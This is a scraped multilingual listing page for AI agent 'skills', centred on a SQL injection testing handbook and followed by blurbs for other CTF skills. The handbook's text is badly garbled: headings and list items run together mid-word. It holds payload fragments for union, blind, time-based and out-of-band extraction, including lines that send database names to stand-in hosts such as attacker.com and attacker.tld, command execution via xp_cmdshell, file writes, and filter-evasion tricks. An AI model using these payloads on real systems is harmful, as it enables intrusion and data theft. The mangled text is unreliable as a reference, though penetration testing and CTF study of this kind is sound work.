用于对抗样本、模型提取、提示注入、成员推断、训练投毒、LoRA 滥用、LLM 越狱等 AI/ML 相关 CTF 题;触发名:ctf-ai-ml
日本語の概要は準備中です。原文の説明を表示しています。
Strix SQL 注入测试手册,覆盖 union、blind、error-based 与 ORM 绕过技巧;触发名:strix-sql-injection
インストール方法を見るインストールする前に、エージェントに与えられる指示の中身を確認できます。
SQLi remains one of the most durable and impactful vulnerability classes. Modern exploitation focuses on parser differentials, ORM/query-builder edges, JSON/XML/CTE/JSONB surfaces, out-of-band exfiltration, and subtle blind channels. Treat every string concatenation into SQL as suspect.
Databases
Integration Paths
Input Locations
whereRaw/orderByRaw, string templates in ORMsError-Based
Boolean-Based
Time-Based
SLEEP/pg_sleep/WAITFOROut-of-Band (OAST)
@@version, database(), user(), current_user()extractvalue()/updatexml() (older), JSON functions for error shapingLOAD_FILE(), SELECT ... INTO DUMPFILE/OUTFILE (requires FILE privilege, secure_file_priv)LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'))SLEEP(n), BENCHMARKJSON_EXTRACT/JSON_SEARCH with crafted paths; GIS funcs sometimes leakversion(), current_user, current_database()xpath() errors in xml2COPY (program ...) or dblink/foreign data wrappers (when enabled); http extensionspg_sleep(n)COPY table TO/FROM '/path' (requires superuser), lo_import/lo_export->, ->>, @>, ?| with lateral/CTE for blind extraction@@version, db_name(), system_user, user_name()xp_dirtree, xp_fileexist; HTTP via OLE automation (sp_OACreate) if enabledxp_cmdshell (often disabled), OPENROWSET/OPENDATASOURCEWAITFOR DELAY '0:0:5'; heavy functions cause measurable delaysFOR XML PATH leaksv$version, ora_database_name, userUTL_HTTP/DBMS_LDAP/UTL_INADDR/HTTPURITYPE (permissions dependent)dbms_lock.sleep(n)to_number/to_date conversions, XMLTypeUTL_FILE with directory objects (privileged)ORDER BY n and UNION SELECT null,...CAST/CONVERT; coerce to text/json for renderingSUBSTRING/ASCII, LEFT/RIGHT, or JSON/array operatorsAND (SELECT CASE WHEN (predicate) THEN pg_sleep(0.5) ELSE 0 END)xp_dirtree \\\\<data>.attacker.tld\\aUTL_HTTP.REQUEST('http://<data>.attacker')LOAD_FILE with UNC pathINTO OUTFILE/DUMPFILE, COPY TO, xp_cmdshell redirectionwhereRaw/orderByRaw, string interpolation into LIKE/IN/ORDER clauses@> in PostgreSQL) with raw fragmentsIN (...))CASE WHEN for boolean channelsMATCH AGAINST, to_tsvector/to_tsquery with payload mixingWhitespace/Spacing
/**/, /**/!00000, comments, newlines, tabs0xe3 0x80 0x80 (ideographic space)Keyword Splitting
UN/**/ION, U%4eION, backticks/quotes, case foldingNumeric Tricks
0x61646d696e)Encodings
char()/CONCAT_ws to build tokensClause Relocation
WITH), lateral joins to hide payload shapewhereRaw/orderByRawModern SQLi succeeds where authorization and query construction drift from assumptions. Bind parameters everywhere, avoid dynamic identifiers, and validate at the exact boundary where user input meets SQL.
まだレビューはありません。使ってみた感想をお寄せください。
概要と使いどころ
用于对抗样本、模型提取、提示注入、成员推断、训练投毒、LoRA 滥用、LLM 越狱等 AI/ML 相关 CTF 题;触发名:ctf-ai-ml
日本語の概要は準備中です。原文の説明を表示しています。
用于 XSS、SQL 注入、SSTI、SSRF、XXE、JWT、鉴权绕过、文件上传、请求走私、OAuth/OIDC、SAML 与原型污染等 Web 类 CTF 题;触发名:ctf-web
日本語の概要は準備中です。原文の説明を表示しています。
用于缓冲区溢出、格式化字符串、堆利用、ROP、ret2libc、shellcode、内核利用、seccomp 绕过与沙箱逃逸等 pwn 类 CTF 题;触发名:ctf-pwn
日本語の概要は準備中です。原文の説明を表示しています。
用于 RSA、AES、ECC、格攻击、LWE、CVP、Coppersmith、Pollard、Wiener、填充预言机、GCM、KDF、伪随机数与零知识证明等密码学和数学类 CTF 题;触发名:ctf-crypto
日本語の概要は準備中です。原文の説明を表示しています。
用于公开资料检索、社交媒体分析、地理定位、DNS、用户名枚举、反向图片搜索、历史快照、公开记录与坐标识别等 OSINT 类 CTF 题;触发名:ctf-osint
日本語の概要は準備中です。原文の説明を表示しています。
用于混淆脚本、恶意样本、自定义加密协议、C2 流量、PE/.NET 二进制、RC4/AES 通信、YARA、shellcode、进程注入与反分析等恶意软件类 CTF 题;触发名:ctf-malware
日本語の概要は準備中です。原文の説明を表示しています。